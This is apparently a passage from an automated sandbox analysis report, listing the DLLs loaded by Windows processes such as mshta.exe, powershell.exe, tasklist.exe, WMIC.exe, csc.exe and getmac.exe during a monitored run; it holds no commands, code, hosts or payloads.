              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
